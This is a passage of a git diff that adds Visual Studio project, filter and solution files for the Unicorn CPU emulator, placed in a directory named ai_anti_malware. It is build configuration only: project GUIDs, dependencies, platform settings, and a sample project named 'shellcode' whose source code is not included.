<AdditionalDependencies>kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies);unicorn_static.lib</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj.filters new file mode 100644 index 0000000..1f571b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/samples/shellcode/shellcode.vcxproj.filters @@ -0,0 +1,6 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <ClCompile Include="..\..\..\samples\shellcode.c" /> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn.sln b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn.sln new file mode 100644 index 0000000..03da775 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn.sln @@ -0,0 +1,370 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2012 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "unicorn", "unicorn\unicorn\unicorn.vcxproj", "{ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}" + ProjectSection(ProjectDependencies) = postProject + {740F3007-7BF0-4C0C-8FA5-2587C794EF31} = {740F3007-7BF0-4C0C-8FA5-2587C794EF31} + {006A7908-ABF3-4D18-BC35-0A29E39B95F9} = {006A7908-ABF3-4D18-BC35-0A29E39B95F9} + {63050112-E486-4396-B5E4-303C3BC12D39} = {63050112-E486-4396-B5E4-303C3BC12D39} + {8804AD29-E398-480C-AC0F-98EC1B7A51CB} = {8804AD29-E398-480C-AC0F-98EC1B7A51CB} + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} = {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} + 
{2C5AD347-6E34-463B-8289-00578E43B255} = {2C5AD347-6E34-463B-8289-00578E43B255} + {4A9F9353-DB63-460A-BB1C-9CB519DFD414} = {4A9F9353-DB63-460A-BB1C-9CB519DFD414} + {698C2D54-475C-446F-B879-F629BBEF75FE} = {698C2D54-475C-446F-B879-F629BBEF75FE} + {17077E86-AE7C-41AF-86ED-2BAC03B019BC} = {17077E86-AE7C-41AF-86ED-2BAC03B019BC} + {4478909E-6983-425C-9D9F-558CF258E61E} = {4478909E-6983-425C-9D9F-558CF258E61E} + {340D86A5-E53C-490B-880A-8EB1F5BDE947} = {340D86A5-E53C-490B-880A-8EB1F5BDE947} + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} = {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "unicorn_static", "unicorn\unicorn_static\unicorn_static.vcxproj", "{B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}" + ProjectSection(ProjectDependencies) = postProject + {740F3007-7BF0-4C0C-8FA5-2587C794EF31} = {740F3007-7BF0-4C0C-8FA5-2587C794EF31} + {006A7908-ABF3-4D18-BC35-0A29E39B95F9} = {006A7908-ABF3-4D18-BC35-0A29E39B95F9} + {63050112-E486-4396-B5E4-303C3BC12D39} = {63050112-E486-4396-B5E4-303C3BC12D39} + {8804AD29-E398-480C-AC0F-98EC1B7A51CB} = {8804AD29-E398-480C-AC0F-98EC1B7A51CB} + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} = {2A7F483F-CD19-4F84-BBDA-B6A1865E2773} + {2C5AD347-6E34-463B-8289-00578E43B255} = {2C5AD347-6E34-463B-8289-00578E43B255} + {4A9F9353-DB63-460A-BB1C-9CB519DFD414} = {4A9F9353-DB63-460A-BB1C-9CB519DFD414} + {698C2D54-475C-446F-B879-F629BBEF75FE} = {698C2D54-475C-446F-B879-F629BBEF75FE} + {17077E86-AE7C-41AF-86ED-2BAC03B019BC} = {17077E86-AE7C-41AF-86ED-2BAC03B019BC} + {4478909E-6983-425C-9D9F-558CF258E61E} = {4478909E-6983-425C-9D9F-558CF258E61E} + {340D86A5-E53C-490B-880A-8EB1F5BDE947} = {340D86A5-E53C-490B-880A-8EB1F5BDE947} + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} = {F67EB1EA-DCFA-4758-A2AA-4B570BA78036} + EndProjectSection +EndProject +Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "softmmu", "softmmu", "{857A09AF-FE20-461C-B66F-D779422AD46B}" +EndProject 
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aarch64-softmmu", "unicorn\aarch64-softmmu\aarch64-softmmu.vcxproj", "{2A7F483F-CD19-4F84-BBDA-B6A1865E2773}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "arm-softmmu", "unicorn\arm-softmmu\arm-softmmu.vcxproj", "{F67EB1EA-DCFA-4758-A2AA-4B570BA78036}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "armeb-softmmu", "unicorn\armeb-softmmu\armeb-softmmu.vcxproj", "{740F3007-7BF0-4C0C-8FA5-2587C794EF31}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "m68k-softmmu", "unicorn\m68k-softmmu\m68k-softmmu.vcxproj", "{2C5AD347-6E34-463B-8289-00578E43B255}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mips-softmmu", "unicorn\mips-softmmu\mips-softmmu.vcxproj", "{63050112-E486-4396-B5E4-303C3BC12D39}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mips64-softmmu", "unicorn\mips64-softmmu\mips64-softmmu.vcxproj", "{4A9F9353-DB63-460A-BB1C-9CB519DFD414}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mips64el-softmmu", "unicorn\mips64el-softmmu\mips64el-softmmu.vcxproj", "{4478909E-6983-425C-9D9F-558CF258E61E}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mipsel-softmmu", "unicorn\mipsel-softmmu\mipsel-softmmu.vcxproj", "{006A7908-ABF3-4D18-BC35-0A29E39B95F9}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sparc-softmmu", "unicorn\sparc-softmmu\sparc-softmmu.vcxproj", "{698C2D54-475C-446F-B879-F629BBEF75FE}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sparc64-softmmu", "unicorn\sparc64-softmmu\sparc64-softmmu.vcxproj", "{8804AD29-E398-480C-AC0F-98EC1B7A51CB}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "x86_64-softmmu", "unicorn\x86_64-softmmu\x86_64-softmmu.vcxproj", "{17077E86-AE7C-41AF-86ED-2BAC03B019BC}" +EndProject +Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "samples", "samples", 
"{F8E85E25-4D67-4A6B-A976-C920790B8798}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "mem_apis", "samples\mem_apis\mem_apis.vcxproj", "{9D588288-5A28-4AB3-96EA-442CAA508F8E}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_arm", "samples\sample_arm\sample_arm.vcxproj", "{9F32C692-9106-43AF-A291-779A2D8BE096}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_arm64", "samples\sample_arm64\sample_arm64.vcxproj", "{04DC0E3A-F247-45C2-AE27-8DE7493AA43B}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_batch_reg", "samples\sample_batch_reg\sample_batch_reg.vcxproj", "{7AA02EDF-D797-494B-929C-F628F4E4EA62}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_m68k", "samples\sample_m68k\sample_m68k.vcxproj", "{11727C54-463F-472A-88AF-6C3D6071BF0B}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_mips", "samples\sample_mips\sample_mips.vcxproj", "{E34ECD90-3977-4A4B-9641-4D7F1766E9FD}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject 
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_sparc", "samples\sample_sparc\sample_sparc.vcxproj", "{A25CA34D-2F64-442B-A5D3-B13CB56C9957}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_x86", "samples\sample_x86\sample_x86.vcxproj", "{F8053D66-8267-433A-BF2C-E07E2298C338}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_x86_32_gdt_and_seg_regs", "samples\sample_x86_32_gdt_and_seg_regs\sample_x86_32_gdt_and_seg_regs.vcxproj", "{9D96D09A-DE17-4011-9247-F0009E8D6DB5}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcode", "samples\shellcode\shellcode.vcxproj", "{F113B460-4B21-4014-9A15-D472FAA9E3F9}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_armeb", "samples\sample_armeb\sample_armeb.vcxproj", "{1945F27B-ABB3-47F9-9268-A42F73C8B992}" + ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "aarch64eb-softmmu", "unicorn\aarch64eb-softmmu\aarch64eb-softmmu.vcxproj", "{340D86A5-E53C-490B-880A-8EB1F5BDE947}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "sample_arm64eb", "samples\sample_arm64eb\sample_arm64eb.vcxproj", "{1A42A5E3-82A7-4EE4-B7D2-8265B147F124}" + 
ProjectSection(ProjectDependencies) = postProject + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} = {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96} + EndProjectSection +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|Win32.ActiveCfg = Debug|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|Win32.Build.0 = Debug|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|x64.ActiveCfg = Debug|x64 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Debug|x64.Build.0 = Debug|x64 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|Win32.ActiveCfg = Release|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|Win32.Build.0 = Release|Win32 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|x64.ActiveCfg = Release|x64 + {ACB78BBB-E8F4-4EAD-B981-9C6155DE100B}.Release|x64.Build.0 = Release|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|Win32.ActiveCfg = Debug|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|Win32.Build.0 = Debug|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|x64.ActiveCfg = Debug|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Debug|x64.Build.0 = Debug|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|Win32.ActiveCfg = Release|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|Win32.Build.0 = Release|Win32 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|x64.ActiveCfg = Release|x64 + {B6EFD6D7-C2D4-4FBB-B363-2E08CE09CC96}.Release|x64.Build.0 = Release|x64 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|Win32.ActiveCfg = Debug|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|Win32.Build.0 = Debug|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|x64.ActiveCfg = Debug|x64 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Debug|x64.Build.0 = Debug|x64 + 
{2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|Win32.ActiveCfg = Release|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|Win32.Build.0 = Release|Win32 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|x64.ActiveCfg = Release|x64 + {2A7F483F-CD19-4F84-BBDA-B6A1865E2773}.Release|x64.Build.0 = Release|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|Win32.ActiveCfg = Debug|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|Win32.Build.0 = Debug|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|x64.ActiveCfg = Debug|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Debug|x64.Build.0 = Debug|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|Win32.ActiveCfg = Release|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|Win32.Build.0 = Release|Win32 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|x64.ActiveCfg = Release|x64 + {F67EB1EA-DCFA-4758-A2AA-4B570BA78036}.Release|x64.Build.0 = Release|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|Win32.ActiveCfg = Debug|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|Win32.Build.0 = Debug|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|x64.ActiveCfg = Debug|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Debug|x64.Build.0 = Debug|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|Win32.ActiveCfg = Release|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|Win32.Build.0 = Release|Win32 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|x64.ActiveCfg = Release|x64 + {740F3007-7BF0-4C0C-8FA5-2587C794EF31}.Release|x64.Build.0 = Release|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|Win32.ActiveCfg = Debug|Win32 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|Win32.Build.0 = Debug|Win32 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|x64.ActiveCfg = Debug|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Debug|x64.Build.0 = Debug|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Release|Win32.ActiveCfg = Release|Win32 + {2C5AD347-6E34-463B-8289-00578E43B255}.Release|Win32.Build.0 = Release|Win32 + 
{2C5AD347-6E34-463B-8289-00578E43B255}.Release|x64.ActiveCfg = Release|x64 + {2C5AD347-6E34-463B-8289-00578E43B255}.Release|x64.Build.0 = Release|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|Win32.ActiveCfg = Debug|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|Win32.Build.0 = Debug|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|x64.ActiveCfg = Debug|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Debug|x64.Build.0 = Debug|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|Win32.ActiveCfg = Release|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|Win32.Build.0 = Release|Win32 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|x64.ActiveCfg = Release|x64 + {63050112-E486-4396-B5E4-303C3BC12D39}.Release|x64.Build.0 = Release|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|Win32.ActiveCfg = Debug|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|Win32.Build.0 = Debug|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|x64.ActiveCfg = Debug|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Debug|x64.Build.0 = Debug|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|Win32.ActiveCfg = Release|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|Win32.Build.0 = Release|Win32 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|x64.ActiveCfg = Release|x64 + {4A9F9353-DB63-460A-BB1C-9CB519DFD414}.Release|x64.Build.0 = Release|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|Win32.ActiveCfg = Debug|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|Win32.Build.0 = Debug|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|x64.ActiveCfg = Debug|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Debug|x64.Build.0 = Debug|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|Win32.ActiveCfg = Release|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|Win32.Build.0 = Release|Win32 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|x64.ActiveCfg = Release|x64 + {4478909E-6983-425C-9D9F-558CF258E61E}.Release|x64.Build.0 = Release|x64 + 
{006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|Win32.ActiveCfg = Debug|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|Win32.Build.0 = Debug|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|x64.ActiveCfg = Debug|x64 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Debug|x64.Build.0 = Debug|x64 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|Win32.ActiveCfg = Release|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|Win32.Build.0 = Release|Win32 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|x64.ActiveCfg = Release|x64 + {006A7908-ABF3-4D18-BC35-0A29E39B95F9}.Release|x64.Build.0 = Release|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|Win32.ActiveCfg = Debug|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|Win32.Build.0 = Debug|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|x64.ActiveCfg = Debug|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Debug|x64.Build.0 = Debug|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|Win32.ActiveCfg = Release|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|Win32.Build.0 = Release|Win32 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|x64.ActiveCfg = Release|x64 + {698C2D54-475C-446F-B879-F629BBEF75FE}.Release|x64.Build.0 = Release|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|Win32.ActiveCfg = Debug|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|Win32.Build.0 = Debug|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|x64.ActiveCfg = Debug|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Debug|x64.Build.0 = Debug|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|Win32.ActiveCfg = Release|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|Win32.Build.0 = Release|Win32 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|x64.ActiveCfg = Release|x64 + {8804AD29-E398-480C-AC0F-98EC1B7A51CB}.Release|x64.Build.0 = Release|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|Win32.ActiveCfg = Debug|Win32 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|Win32.Build.0 = Debug|Win32 + 
{17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|x64.ActiveCfg = Debug|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Debug|x64.Build.0 = Debug|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|Win32.ActiveCfg = Release|Win32 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|Win32.Build.0 = Release|Win32 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|x64.ActiveCfg = Release|x64 + {17077E86-AE7C-41AF-86ED-2BAC03B019BC}.Release|x64.Build.0 = Release|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|Win32.ActiveCfg = Debug|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|Win32.Build.0 = Debug|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|x64.ActiveCfg = Debug|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Debug|x64.Build.0 = Debug|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|Win32.ActiveCfg = Release|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|Win32.Build.0 = Release|Win32 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|x64.ActiveCfg = Release|x64 + {9D588288-5A28-4AB3-96EA-442CAA508F8E}.Release|x64.Build.0 = Release|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|Win32.ActiveCfg = Debug|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|Win32.Build.0 = Debug|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|x64.ActiveCfg = Debug|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Debug|x64.Build.0 = Debug|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|Win32.ActiveCfg = Release|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|Win32.Build.0 = Release|Win32 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|x64.ActiveCfg = Release|x64 + {9F32C692-9106-43AF-A291-779A2D8BE096}.Release|x64.Build.0 = Release|x64 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|Win32.ActiveCfg = Debug|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|Win32.Build.0 = Debug|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|x64.ActiveCfg = Debug|x64 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Debug|x64.Build.0 = Debug|x64 + 
{04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|Win32.ActiveCfg = Release|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|Win32.Build.0 = Release|Win32 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|x64.ActiveCfg = Release|x64 + {04DC0E3A-F247-45C2-AE27-8DE7493AA43B}.Release|x64.Build.0 = Release|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|Win32.ActiveCfg = Debug|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|Win32.Build.0 = Debug|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|x64.ActiveCfg = Debug|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Debug|x64.Build.0 = Debug|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|Win32.ActiveCfg = Release|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|Win32.Build.0 = Release|Win32 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|x64.ActiveCfg = Release|x64 + {7AA02EDF-D797-494B-929C-F628F4E4EA62}.Release|x64.Build.0 = Release|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|Win32.ActiveCfg = Debug|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|Win32.Build.0 = Debug|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|x64.ActiveCfg = Debug|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Debug|x64.Build.0 = Debug|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|Win32.ActiveCfg = Release|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|Win32.Build.0 = Release|Win32 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|x64.ActiveCfg = Release|x64 + {11727C54-463F-472A-88AF-6C3D6071BF0B}.Release|x64.Build.0 = Release|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|Win32.ActiveCfg = Debug|Win32 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|Win32.Build.0 = Debug|Win32 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|x64.ActiveCfg = Debug|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Debug|x64.Build.0 = Debug|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|Win32.ActiveCfg = Release|Win32 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|Win32.Build.0 = Release|Win32 + 
{E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|x64.ActiveCfg = Release|x64 + {E34ECD90-3977-4A4B-9641-4D7F1766E9FD}.Release|x64.Build.0 = Release|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|Win32.ActiveCfg = Debug|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|Win32.Build.0 = Debug|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|x64.ActiveCfg = Debug|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Debug|x64.Build.0 = Debug|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|Win32.ActiveCfg = Release|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|Win32.Build.0 = Release|Win32 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|x64.ActiveCfg = Release|x64 + {A25CA34D-2F64-442B-A5D3-B13CB56C9957}.Release|x64.Build.0 = Release|x64 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|Win32.ActiveCfg = Debug|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|Win32.Build.0 = Debug|Win32 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|x64.ActiveCfg = Debug|x64 + {F8053D66-8267-433A-BF2C-E07E2298C338}.Debug|x64.Build.0 = Debug|x64 + 